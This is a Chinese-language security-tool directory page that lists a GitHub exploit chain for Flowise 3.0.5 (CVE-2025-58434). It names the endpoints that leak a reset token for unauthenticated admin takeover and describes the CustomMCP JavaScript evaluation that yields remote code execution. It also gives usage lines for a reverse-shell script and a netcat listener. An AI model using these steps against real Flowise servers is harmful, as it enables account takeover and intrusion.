Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-58434 — Flowise 3.0.5 的漏洞利用链:通过密码重置令牌泄露实现未认证账户接管(CVE-2025-58434),并与 CustomMCP JavaScript 评估链式结合以实现远程代码执行。 | Kitploit
工具/GitHubGitHub/r3vpwnx/cve-2025-58434
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证红队
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

Flowise 3.0.5 的漏洞利用链:通过密码重置令牌泄露实现未认证账户接管(CVE-2025-58434),并与 CustomMCP JavaScript 评估链式结合以实现远程代码执行。

查看仓库
1521天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-58434 - Flowise 未认证账户接管,链接至 CustomMCP RCE

两个 Flowise 3.0.5 问题,已链接:

  1. CVE-2025-58434 - 密码重置令牌泄露。 POST /api/v1/account/forgot-password 直接在 JSON 响应中返回目标用户的 tempToken。将其提供给 POST /api/v1/account/reset-password 即可为任何账户(包括第一个管理员)设置已知密码 -> 完全未认证账户接管。
  2. CustomMCP mcpServerConfig 服务端 JavaScript 评估。 拥有会话和工作区 API 密钥(来自步骤 1)后, POST /api/v1/node-load-method/customMCP 配合 loadMethod=listActions 会将 mcpServerConfig 字符串作为 JavaScript 在 Flowise 进程中评估, 从而获得 require('child_process').exec() RCE。(此处仅用于将 ATO 转化为代码执行的独立 Flowise 问题;撰写本文时尚未分配 CVE。)

CVE: CVE-2025-58434

要求

python3 -m pip install requests

用法

flowise_ato_foothold.py - 完整链(ATO -> API 密钥 -> CustomMCP 反向 shell)

python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# 请准备好 `nc -lvnp <LPORT>`

flowise_customMCP_rce.py - 仅 CustomMCP RCE(需要 API 密钥)

python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'

参考

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD:CVE-2025-58434

免责声明

仅用于授权安全测试和教育目的。仅可针对您拥有或已获得明确书面许可的系统运行。


作者:r3vpwnx

下载工具